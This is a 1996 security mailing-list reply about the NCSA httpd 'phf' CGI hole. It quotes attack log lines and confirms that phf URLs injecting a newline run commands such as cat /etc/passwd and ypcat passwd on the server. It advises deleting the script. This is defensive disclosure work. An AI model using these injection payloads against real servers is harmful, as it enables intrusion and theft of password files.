[2949] in WWW Security List Archive
Re: 'phf' cgi-bin attack
daemon@ATHENA.MIT.EDU (Tony Beaumont)
Tue Sep 17 08:01:34 1996
From: beaumoaj@helios.aston.ac.uk (Tony Beaumont)
To: jordi@webarna.com (Jordi =?iso-8859-1?Q?Matem=E0tic?= Salvat)
Date: Tue, 17 Sep 1996 11:15:51 +0100 (BST)
Cc: beaumoaj@aston.ac.uk, www-security@ns2.rutgers.edu
In-Reply-To: <323DD2B8.4EAC@webarna.com> from "Jordi =?iso-8859-1?Q?Matem=E0tic?= Salvat" at Sep 16, 96 10:20:45 pm
Errors-To: owner-www-security@ns2.rutgers.edu
> Many Spanish ISPs are receiving attack attempts on their WWW servers...
>
> info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET
> /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
> infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET
> /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>
> Obviously attempting to get the passwd file.
Yes, and it works
/cgi-bin/phf?Qalias=x%0a/bin/ypcat%20passwd
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
return the password file and the output from ypcat.
In general, this seems to be a way of executing commands on the
server. I guess the commands are executed as 'nobody' but I'll have to
check that.
> Does anyone know what this 'phf' cgi-bin is supposed to be?
The source of phf comes with NCSA Httpd Server v1.5a (and probably with
other versions too). I'd suggest deleting it from your cgi-bin if you
have it. I have a copy of the source if anyone wants me to post it to
the list.
-Tony Beaumont
Aston university
